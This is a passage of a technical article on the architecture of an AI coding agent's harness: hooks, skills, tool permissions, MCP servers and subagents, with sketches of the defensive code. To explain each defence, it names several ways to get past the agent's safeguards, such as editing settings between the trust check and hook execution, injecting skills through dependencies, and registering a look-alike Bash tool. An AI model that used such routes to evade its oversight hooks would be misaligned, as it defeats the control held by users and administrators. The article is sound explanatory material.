&lt;p&gt;&lt;strong&gt;Prompt hooks&lt;/strong&gt; send the hook input to a fast model (Haiku by default) with a structured output schema: &lt;code&gt;{ok: boolean, reason?: string}&lt;/code&gt;. No tool access. 30-second timeout. The LLM evaluates whether the action should proceed — useful when the decision requires judgment ("is this API call secure?") rather than deterministic checking. Thinking is disabled to reduce cost and latency.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent hooks&lt;/strong&gt; are multi-turn: they spawn a restricted agent that can use tools (Read, Bash) to investigate, then must call a synthetic output tool with &lt;code&gt;{ok, reason}&lt;/code&gt;. 60-second timeout, 50-turn limit. The agent can read test output, check file contents, then make a judgment. Its tool pool is filtered — no subagent spawning, no plan mode — to prevent recursive agent creation. If the agent hits 50 turns without producing structured output, it's cancelled silently — a fail-safe against infinite loops.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HTTP hooks&lt;/strong&gt; POST the JSON input to a URL. SSRF protection blocks private/link-local IP ranges (except loopback). No redirects are followed (&lt;code&gt;maxRedirects: 0&lt;/code&gt;). Header values support environment variable interpolation, but only from an explicit allowlist — &lt;code&gt;$SECRET_TOKEN&lt;/code&gt; only resolves if &lt;code&gt;SECRET_TOKEN&lt;/code&gt; is in the hook's &lt;code&gt;allowedEnvVars&lt;/code&gt; array. Unresolved variables expand to empty strings, preventing accidental exfiltration. CRLF and NUL bytes are stripped from header values to prevent header injection attacks.&lt;/p&gt;
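&lt;p&gt;The header hardening combines two rules: allowlisted interpolation and control-byte stripping. A sketch, with the &lt;code&gt;$VAR&lt;/code&gt; matching and function shape assumed:&lt;/p&gt;

```python
import os
import re

VAR_RE = re.compile(r"\$([A-Z_][A-Z0-9_]*)")

def render_header_value(template, allowed_env_vars):
    def substitute(match):
        name = match.group(1)
        if name in allowed_env_vars:
            return os.environ.get(name, "")
        return ""  # not allowlisted: expands to empty, never leaked
    value = VAR_RE.sub(substitute, template)
    # Strip CR, LF, and NUL to block header-injection payloads.
    return value.replace("\r", "").replace("\n", "").replace("\x00", "")
```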

&lt;p&gt;HTTP hooks are blocked for SessionStart and Setup events in headless mode — the sandbox callback would deadlock because the structured input consumer hasn't started yet when these hooks fire.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern Matching
&lt;/h3&gt;

&lt;p&gt;Hooks can filter by event subtype. A PreToolUse hook with matcher &lt;code&gt;"Write|Edit"&lt;/code&gt; only fires for file writes and edits. Matchers support:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Simple strings: &lt;code&gt;"Write"&lt;/code&gt; (exact match)&lt;/li&gt;
&lt;li&gt;Pipe-separated: &lt;code&gt;"Write|Edit"&lt;/code&gt; (multiple exact matches)&lt;/li&gt;
&lt;li&gt;Regex patterns: &lt;code&gt;"^Bash.*"&lt;/code&gt; (full regex)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;An additional &lt;code&gt;if&lt;/code&gt; condition supports permission-rule syntax: &lt;code&gt;"Bash(git *)"&lt;/code&gt; only fires for bash commands starting with &lt;code&gt;git&lt;/code&gt;.&lt;/p&gt;
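&lt;p&gt;The three matcher forms collapse neatly because the first two are valid regexes: "Write" and "Write|Edit" mean the same thing as anchored patterns that they do as exact matches. One way to unify them (how the real implementation distinguishes the forms is not shown in the article):&lt;/p&gt;

```python
import re

def matcher_fires(matcher, tool_name):
    if matcher is None:
        return True  # no matcher configured: fire for every tool
    # fullmatch anchors both ends, so "Write" stays an exact match while
    # "Write|Edit" and "^Bash.*" behave as expected.
    return re.fullmatch(matcher, tool_name) is not None
```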

&lt;h3&gt;
  
  
  Aggregation and Priority
&lt;/h3&gt;

&lt;p&gt;Multiple hooks can fire for the same event. Results are aggregated with a strict priority:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. Any hook returns "deny"    → action is blocked (deny wins)
2. Any hook returns "allow"   → action is allowed (if no deny)
3. Any hook returns "ask"     → prompt the user
4. Default                    → normal permission flow
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A single deny from any hook overrides all allows. This is the fail-closed property: a security hook can't be overridden by a convenience hook.&lt;/p&gt;
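&lt;p&gt;The aggregation order above is a short cascade; the result labels here are illustrative:&lt;/p&gt;

```python
def aggregate_hook_decisions(decisions):
    # decisions: one of "deny" / "allow" / "ask" / None per hook.
    if "deny" in decisions:
        return "deny"      # a single deny overrides everything
    if "allow" in decisions:
        return "allow"
    if "ask" in decisions:
        return "ask"
    return "default"       # fall through to the normal permission flow
```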

&lt;h3&gt;
  
  
  Configuration Snapshot
&lt;/h3&gt;

&lt;p&gt;Hook configurations are captured at startup into a frozen snapshot. Settings changes during the session update the snapshot, but the hooks that actually execute come from this snapshot — not from a live re-read of settings files. This prevents a TOCTOU attack where a process modifies &lt;code&gt;.claude/settings.json&lt;/code&gt; between the trust check and hook execution.&lt;/p&gt;

&lt;p&gt;Enterprise policy can lock hooks to managed-only (&lt;code&gt;allowManagedHooksOnly&lt;/code&gt;), meaning only admin-defined hooks execute. Non-managed settings can't override this — the check happens in the snapshot capture, not at execution time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Trade-Off: Safety Over Convenience
&lt;/h3&gt;

&lt;p&gt;SessionEnd hooks get a 1.5-second timeout (configurable via environment variable), not the 10-minute default. The reasoning: session teardown must be fast. A hook that takes 30 seconds to run would make "close the terminal" feel broken. This means complex cleanup (uploading logs, syncing state) must be designed to complete quickly or run asynchronously — a constraint that occasionally frustrates users but keeps the exit path responsive.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 3: Skills — Reusable Prompt Modules
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem It Solves
&lt;/h3&gt;

&lt;p&gt;You have a 500-line review checklist, a commit message template, or a complex deployment procedure. You want the model to follow it exactly when invoked, but you don't want it consuming context on every turn.&lt;/p&gt;

&lt;h3&gt;
  
  
  Progressive Disclosure
&lt;/h3&gt;

&lt;p&gt;Skills use a three-level disclosure strategy to manage context:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level 1 — Metadata only (always loaded):&lt;/strong&gt; The skill's name, description, and &lt;code&gt;when_to_use&lt;/code&gt; field are injected into the system prompt's skill listing. This costs ~50–100 tokens per skill. A budget cap (1% of context window, ~8KB) limits total skill metadata — if you have 200 skills, descriptions get truncated. Bundled skills (compiled into the binary) are never truncated; user skills are truncated first.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level 2 — Tool prompt:&lt;/strong&gt; When the model decides to invoke a skill, it calls the Skill tool with the skill name. The tool validates the name, checks permissions, and returns a "launching skill" placeholder.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Level 3 — Full content:&lt;/strong&gt; The skill's complete markdown body is loaded, argument substitution is applied (&lt;code&gt;$1&lt;/code&gt;, &lt;code&gt;$2&lt;/code&gt;, &lt;code&gt;${CLAUDE_SESSION_ID}&lt;/code&gt;), inline shell commands are executed (if not from an MCP source), and the result is injected as new conversation messages. Only now does the full 500-line checklist enter the context.&lt;/p&gt;

&lt;p&gt;This means 200 skills cost ~8KB of ongoing context, and only the invoked skill's full body enters the conversation.&lt;/p&gt;
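&lt;p&gt;The Level 1 budget logic can be sketched as follows. The ~1% cap and the bundled-skills exemption come from the article; the character sizing and entry format are assumptions:&lt;/p&gt;

```python
def build_skill_listing(skills, context_window, chars_per_token=4):
    # Budget: roughly 1% of the context window, expressed in characters.
    budget = int(context_window * 0.01) * chars_per_token
    bundled = [s for s in skills if s["bundled"]]
    user = [s for s in skills if not s["bundled"]]
    listing = []
    used = 0
    for skill in bundled + user:   # bundled first: never truncated
        entry = skill["name"] + ": " + skill["description"]
        if not skill["bundled"] and used + len(entry) > budget:
            break                  # user skills are truncated first
        listing.append(entry)
        used += len(entry)
    return listing
```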

&lt;h3&gt;
  
  
  Skill Format
&lt;/h3&gt;

&lt;p&gt;A skill lives in a directory: &lt;code&gt;.claude/skills/my-skill/SKILL.md&lt;/code&gt;. The file uses YAML frontmatter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Review code for security vulnerabilities&lt;/span&gt;
&lt;span class="na"&gt;allowed-tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Bash, Read, Grep&lt;/span&gt;
&lt;span class="na"&gt;model&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;opus&lt;/span&gt;
&lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;src/security/**&lt;/span&gt;
&lt;span class="na"&gt;context&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;fork&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;

Review the following code for OWASP Top 10 vulnerabilities...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key frontmatter fields:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;allowed-tools&lt;/code&gt; — which tools the skill can use (added to permission rules)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;model&lt;/code&gt; — model override (&lt;code&gt;opus&lt;/code&gt;, &lt;code&gt;sonnet&lt;/code&gt;, &lt;code&gt;haiku&lt;/code&gt;, or &lt;code&gt;inherit&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;paths&lt;/code&gt; — conditional activation (skill only available when working on matching files)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;context: fork&lt;/code&gt; — execute in an isolated subagent instead of inline&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;user-invocable&lt;/code&gt; — whether the user can type &lt;code&gt;/skill-name&lt;/code&gt; (default: true)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;hooks&lt;/code&gt; — scoped hooks that only apply during skill execution&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Conditional Skills
&lt;/h3&gt;

&lt;p&gt;Skills with &lt;code&gt;paths&lt;/code&gt; frontmatter start dormant. They're stored in a separate map, not exposed to the model. When a file operation touches a path matching the skill's pattern, the skill activates — it moves to the dynamic skills map and becomes available. This is the same gitignore-style matching used by CLAUDE.md conditional rules.&lt;/p&gt;

&lt;p&gt;Why not just load all skills? Token budget. A project with 50 path-specific skills would waste context on skills irrelevant to the current work. Conditional activation means the model only sees skills relevant to the files it's actually touching.&lt;/p&gt;

&lt;h3&gt;
  
  
  Dynamic Discovery
&lt;/h3&gt;

&lt;p&gt;When the model reads or writes a file in a subdirectory, the system walks upward from that file looking for &lt;code&gt;.claude/skills/&lt;/code&gt; directories. Newly discovered skill directories are loaded and merged into the dynamic skills map. This enables monorepo patterns where each package has its own skills.&lt;/p&gt;

&lt;p&gt;Security: discovered directories are checked against &lt;code&gt;.gitignore&lt;/code&gt;. A skill directory inside &lt;code&gt;node_modules/&lt;/code&gt; is skipped — this prevents dependency packages from injecting skills.&lt;/p&gt;

&lt;h3&gt;
  
  
  Inline Shell Execution
&lt;/h3&gt;

&lt;p&gt;Skills can contain inline shell commands using &lt;code&gt;!&lt;/code&gt; syntax:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;Current git branch: !&lt;span class="sb"&gt;`git branch --show-current`&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the skill body is loaded, these commands execute and their output replaces the command syntax. MCP-sourced skills (remote, potentially untrusted) have shell execution disabled entirely — a hard security boundary. The check is a simple conditional: if the skill's &lt;code&gt;loadedFrom&lt;/code&gt; field is &lt;code&gt;'mcp'&lt;/code&gt;, shell execution is skipped.&lt;/p&gt;
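&lt;p&gt;A sketch of the substitution with the MCP guard in front. The &lt;code&gt;!&lt;/code&gt; syntax and the &lt;code&gt;loadedFrom&lt;/code&gt; check come from the article; the regex and execution details are assumed:&lt;/p&gt;

```python
import re
import subprocess

INLINE_RE = re.compile(r"!`([^`]+)`")

def expand_inline_commands(body, loaded_from):
    if loaded_from == "mcp":
        return body  # hard boundary: no shell execution for MCP skills
    def run(match):
        # Execute the inline command and splice its stdout into the body.
        result = subprocess.run(match.group(1), shell=True,
                                capture_output=True, text=True)
        return result.stdout.strip()
    return INLINE_RE.sub(run, body)
```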

&lt;h3&gt;
  
  
  Permission Model
&lt;/h3&gt;

&lt;p&gt;The first time a skill is invoked by the model, the user is prompted. The permission check supports:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Deny rules (exact or prefix match) → block permanently&lt;/li&gt;
&lt;li&gt;Allow rules (exact or prefix match) → allow permanently&lt;/li&gt;
&lt;li&gt;"Safe properties" auto-allow → skills that only set metadata (model, effort) and don't add tools or hooks are auto-approved&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Default: ask. Unknown skills always prompt.&lt;/p&gt;

&lt;h3&gt;
  
  
  Bundled Skill Security
&lt;/h3&gt;

&lt;p&gt;Skills compiled into the binary extract their reference files to a temporary directory at runtime. The extraction uses &lt;code&gt;O_EXCL | O_NOFOLLOW&lt;/code&gt; flags (POSIX) — the file must not already exist and symlinks are rejected. A per-process nonce in the directory path prevents pre-created symlink attacks. Path traversal protection rejects absolute paths and &lt;code&gt;..&lt;/code&gt; components.&lt;/p&gt;
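&lt;p&gt;On POSIX systems, the combination described above looks roughly like this. A sketch with the path-traversal check simplified and the per-process nonce omitted:&lt;/p&gt;

```python
import os

def safe_extract(base_dir, rel_path, data):
    # Reject absolute paths and ".." components before any filesystem work.
    if os.path.isabs(rel_path) or ".." in rel_path.split(os.sep):
        raise ValueError("path traversal rejected: " + rel_path)
    dest = os.path.join(base_dir, rel_path)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    # O_EXCL: fail if the file already exists; O_NOFOLLOW: fail on symlinks.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(dest, flags, 0o600)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)
```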




&lt;h2&gt;
  
  
  Layer 4: The Tool Pool — Assembly and Permissions
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem It Solves
&lt;/h3&gt;

&lt;p&gt;The model needs a unified set of tools — built-in (Read, Write, Bash, Agent) plus external (MCP servers, IDE integrations). But which tools are available, and who controls access?&lt;/p&gt;

&lt;h3&gt;
  
  
  Assembly
&lt;/h3&gt;

&lt;p&gt;The tool pool is assembled from two sources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;built_in_tools&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_registered_tools&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;permission_context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;mcp_tools&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;filter_by_deny_rules&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_mcp_tools&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;permission_context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;pool&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;deduplicate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;sort&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;built_in_tools&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nf"&gt;sort&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mcp_tools&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;by_name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three properties are maintained:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Built-ins always win&lt;/strong&gt; — if an MCP tool has the same name as a built-in, the built-in takes precedence (deduplication preserves first occurrence)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stable sort order&lt;/strong&gt; — tools are sorted alphabetically within each partition, keeping built-ins as a contiguous prefix. This is critical for prompt caching: the server places a cache breakpoint after the last built-in tool. If MCP tools interleaved with built-ins, adding one MCP tool would invalidate all cached tool definitions downstream.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deny rules are absolute&lt;/strong&gt; — a tool in the deny list is removed regardless of source&lt;/li&gt;
&lt;/ol&gt;
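&lt;p&gt;Property 1 falls out of a first-occurrence dedup over the concatenated, sorted partitions. A sketch under assumed data shapes:&lt;/p&gt;

```python
# Illustrative sketch of first-occurrence deduplication; the real pool
# items carry full tool definitions, not just names.

def deduplicate(tools: list) -> list:
    seen = set()
    out = []
    for tool in tools:
        if tool["name"] not in seen:
            seen.add(tool["name"])
            out.append(tool)
    return out

built_in = [{"name": "Read", "source": "builtin"}]
external = [{"name": "Read", "source": "mcp"}]  # would shadow the built-in
pool = deduplicate(sorted(built_in, key=lambda t: t["name"]) +
                   sorted(external, key=lambda t: t["name"]))
# The built-in wins because it appears first in the concatenation.
```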

&lt;h3&gt;
  
  
  MCP Tool Namespacing
&lt;/h3&gt;

&lt;p&gt;External tools are namespaced to prevent collisions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mcp__github__create_issue
mcp__jira__create_ticket
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The pattern is &lt;code&gt;mcp__&amp;lt;server&amp;gt;__&amp;lt;tool&amp;gt;&lt;/code&gt;. Server and tool names are normalized: dots, spaces, and special characters become underscores. This namespacing means an MCP server can't shadow a built-in tool — &lt;code&gt;mcp__evil__Read&lt;/code&gt; is a different tool from &lt;code&gt;Read&lt;/code&gt;.&lt;/p&gt;
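&lt;p&gt;A hedged sketch of the &lt;code&gt;mcp__&amp;lt;server&amp;gt;__&amp;lt;tool&amp;gt;&lt;/code&gt; naming scheme; the exact set of characters that get normalized is an assumption:&lt;/p&gt;

```python
import re

# Sketch of MCP tool namespacing as described above. The normalization
# character class is assumed, not taken from the real implementation.

def mcp_tool_name(server: str, tool: str) -> str:
    def norm(s: str) -> str:
        # dots, spaces, and other special characters become underscores
        return re.sub(r"[^A-Za-z0-9_-]", "_", s)
    return f"mcp__{norm(server)}__{norm(tool)}"
```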

&lt;h3&gt;
  
  
  IDE Tool Filtering
&lt;/h3&gt;

&lt;p&gt;IDE extensions connect via MCP but have restricted access. Only two specific IDE tools are exposed to the model — the rest are blocked. This prevents an IDE extension from registering a tool named &lt;code&gt;Bash&lt;/code&gt; that bypasses the bash security analyzer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 5: MCP — External Tool Servers
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem It Solves
&lt;/h3&gt;

&lt;p&gt;You want to give the model access to your internal APIs, databases, or third-party services. These capabilities live in separate processes — potentially remote — and need their own lifecycle, authentication, and error recovery.&lt;/p&gt;

&lt;h3&gt;
  
  
  Transport Types
&lt;/h3&gt;

&lt;p&gt;MCP servers connect via six transport types:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;stdio&lt;/strong&gt; — local child process (default, most common)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SSE&lt;/strong&gt; — Server-Sent Events (authenticated remote)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HTTP&lt;/strong&gt; — Streamable HTTP (MCP spec 2025-03-26)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WebSocket&lt;/strong&gt; — bidirectional streaming&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SDK&lt;/strong&gt; — in-process (managed by the SDK)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;claude.ai proxy&lt;/strong&gt; — remote servers bridged through a proxy with OAuth&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Configuration Hierarchy
&lt;/h3&gt;

&lt;p&gt;Like CLAUDE.md, MCP server configs merge from multiple sources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Enterprise    → exclusive control when present (blocks all others)
Local         → .claude/mcp.json in working directory
Project       → claude.json in project root
User          → ~/.claude/mcp.json
Dynamic       → SDK-provided servers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When an enterprise config exists, it has total control. Other scopes are blocked. This is the nuclear option for organizations that need to control exactly which external services the model can access.&lt;/p&gt;

&lt;h3&gt;
  
  
  Enterprise Allowlist/Denylist
&lt;/h3&gt;

&lt;p&gt;Policy settings define three types of allowlist entries:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name-based&lt;/strong&gt;: &lt;code&gt;{serverName: "github"}&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Command-based&lt;/strong&gt;: &lt;code&gt;{serverCommand: ["node", "path/to/mcp.js"]}&lt;/code&gt; (for stdio servers)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;URL-based&lt;/strong&gt;: &lt;code&gt;{serverUrl: "https://mcp.example.com"}&lt;/code&gt; (for remote servers)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The denylist always wins. A server matching any deny entry is blocked regardless of allowlist membership. If the allowlist exists but is empty, all servers are blocked. If the allowlist is undefined, all servers are allowed. This three-state logic (undefined/empty/populated) gives administrators precise control.&lt;/p&gt;
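&lt;p&gt;The three-state logic can be sketched as follows, with illustrative field names for the server record:&lt;/p&gt;

```python
# Sketch of the allowlist/denylist resolution described above.
# Entry key names come from the text; the server record shape is assumed.

def server_permitted(server: dict, allowlist, denylist) -> bool:
    def entry_matches(entry: dict) -> bool:
        if "serverName" in entry:
            return entry["serverName"] == server.get("name")
        if "serverCommand" in entry:
            return entry["serverCommand"] == server.get("command")
        if "serverUrl" in entry:
            return entry["serverUrl"] == server.get("url")
        return False

    # The denylist always wins, regardless of allowlist membership.
    if denylist and any(entry_matches(e) for e in denylist):
        return False
    if allowlist is None:          # undefined: all servers allowed
        return True
    # Empty allowlist blocks everything; populated requires a match.
    return any(entry_matches(e) for e in allowlist)
```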

&lt;h3&gt;
  
  
  Connection and Timeout
&lt;/h3&gt;

&lt;p&gt;Servers are connected with a 30-second timeout. Connection is batched: 3 local servers in parallel, 20 remote servers in parallel. If a server fails to connect, it enters a failure state but doesn't block other servers.&lt;/p&gt;

&lt;p&gt;Tool calls have a separate timeout — nearly 28 hours by default (configurable). This allows long-running operations (database migrations, large builds) without arbitrary cutoffs. Progress is logged every 30 seconds so the user knows something is happening.&lt;/p&gt;
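&lt;p&gt;The batched, failure-isolated connection behavior can be approximated with semaphores. A sketch, where &lt;code&gt;connect()&lt;/code&gt; and the failure record are stand-ins rather than real APIs:&lt;/p&gt;

```python
import asyncio

# Illustrative sketch of batched MCP connection: 3 local / 20 remote in
# parallel, 30s timeout, and a failed server never blocks the others.

async def connect_all(servers, connect, local_limit=3, remote_limit=20,
                      timeout=30.0):
    limits = {"local": asyncio.Semaphore(local_limit),
              "remote": asyncio.Semaphore(remote_limit)}

    async def one(server):
        async with limits[server["kind"]]:
            try:
                return await asyncio.wait_for(connect(server), timeout)
            except Exception as exc:
                # Failed server enters a failure state; others proceed.
                return {"server": server["name"], "status": "failed",
                        "error": str(exc)}

    return await asyncio.gather(*(one(s) for s in servers))
```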

&lt;h3&gt;
  
  
  Session Expiry and Recovery
&lt;/h3&gt;

&lt;p&gt;Remote servers have stateful sessions. When a session expires, the server returns a 404 with JSON-RPC error code -32001, or the connection closes with error -32000. The client detects both cases, clears the connection cache, and throws a session-expired error. The next tool call will transparently reconnect.&lt;/p&gt;
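&lt;p&gt;The detection logic reduces to a check over the HTTP status and the JSON-RPC error code. A sketch (the error codes come from the text above; the function shape is an assumption):&lt;/p&gt;

```python
# Sketch of session-expiry detection. Codes -32001 and -32000 are from
# the description above; the response fields are assumed.

SESSION_NOT_FOUND = -32001   # server returned 404 with this JSON-RPC code
CONNECTION_CLOSED = -32000   # connection closed mid-session

def is_session_expired(http_status, jsonrpc_error_code) -> bool:
    if http_status == 404 and jsonrpc_error_code == SESSION_NOT_FOUND:
        return True
    return jsonrpc_error_code == CONNECTION_CLOSED
```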

&lt;p&gt;Authentication failures (401) follow a parallel path: the client status updates to "needs-auth," tokens are cached with a 15-minute TTL, and the next connection attempt triggers a token refresh. OAuth flows support step-up authentication — a 403 response triggers a re-authentication challenge before the SDK's default handler fires.&lt;/p&gt;

&lt;p&gt;A more subtle failure: URL elicitation. Some MCP servers require the user to visit a URL to authorize an action (OAuth consent, MFA challenge). The server returns error code -32042 with a completion URL. The client emits an elicitation request, waits indefinitely for the user to complete the flow, then retries the original tool call. This is a blocking wait — but since it's triggered by a user-facing auth requirement, the blocking is intentional.&lt;/p&gt;

&lt;h3&gt;
  
  
  Error Boundaries
&lt;/h3&gt;

&lt;p&gt;MCP server errors never contain sensitive data. All error messages are wrapped in a telemetry-safe type that strips user code and file paths. Server stderr is buffered to a 64 MB cap to prevent unbounded memory growth from a chatty or malicious server. When a stdio server crashes (ECONNRESET), the error message says "Server may have crashed or restarted" — not the actual stderr contents.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 6: Agents — Delegated Execution
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem It Solves
&lt;/h3&gt;

&lt;p&gt;You want the model to research a codebase in the background while you keep working. You want it to delegate a complex task to a specialist (an "Explore" agent that only searches, a "Plan" agent that only designs). You want multiple agents working in parallel on different parts of a refactor.&lt;/p&gt;

&lt;h3&gt;
  
  
  Three Execution Models
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Synchronous subagents&lt;/strong&gt; share the parent's abort controller. When the user presses Ctrl+C, both parent and child stop. The child's state mutations (tool approvals, file reads) propagate to the parent via shared &lt;code&gt;setAppState&lt;/code&gt;. The child runs inline — the parent waits for it to finish.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Async background agents&lt;/strong&gt; get their own abort controller. The parent continues working. The child's state mutations are isolated — a separate denial counter, separate tool decisions. When the child finishes, its result is delivered as a notification. Permission prompts are auto-denied (the child can't show UI) unless the agent runs in "bubble" mode, where prompts surface in the parent's terminal.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Teammates&lt;/strong&gt; are full separate processes (via tmux split-pane or iTerm2) or in-process runners isolated via AsyncLocalStorage. Each teammate has its own conversation history, its own model, its own abort controller. Communication happens through a file-based mailbox — JSON messages written to a shared team directory. The team lead writes a prompt to a teammate's inbox; the teammate polls it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Context Isolation
&lt;/h3&gt;

&lt;p&gt;Every agent gets its own &lt;code&gt;ToolUseContext&lt;/code&gt; — a structure containing the conversation, tool pool, permissions, abort controller, file state cache, and callbacks. The isolation strategy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;readFileState     → cloned (cache sharing for prompt cache hits)
abortController   → shared (sync) or new (async)
setAppState       → shared (sync) or no-op (async)
messages          → stripped for teammates (they build their own)
tool decisions    → fresh (no leaking parent's approve/deny history)
MCP clients       → merged (parent + agent-specific servers)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The critical insight is that cloning &lt;code&gt;readFileState&lt;/code&gt; isn't about correctness — it's about cache hits. When a forked agent makes an API call, the server checks whether the message prefix matches a cached prefix. If the fork and parent have different file state caches, they'll make different tool-result replacement decisions, producing different message bytes and missing the cache. Cloning ensures byte-identical prefixes.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cache-Safe Forking
&lt;/h3&gt;

&lt;p&gt;After every turn, the parent saves its "cache-safe parameters" — system prompt, user context, system context, tool definitions, and conversation messages. When a fork is created, it retrieves these parameters and uses them directly. The fork's API request starts with a byte-identical prefix, and only the fork's new prompt differs. The server recognizes the shared prefix and reads it from cache — potentially saving 90%+ on input costs for the fork.&lt;/p&gt;

&lt;p&gt;This is why fork children inherit the parent's exact tool pool (&lt;code&gt;useExactTools: true&lt;/code&gt;) and thinking config. Changing even one tool definition would alter the tool schema bytes, breaking the prefix match.&lt;/p&gt;

&lt;h3&gt;
  
  
  Tool Filtering
&lt;/h3&gt;

&lt;p&gt;Each agent definition can specify allowed and disallowed tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
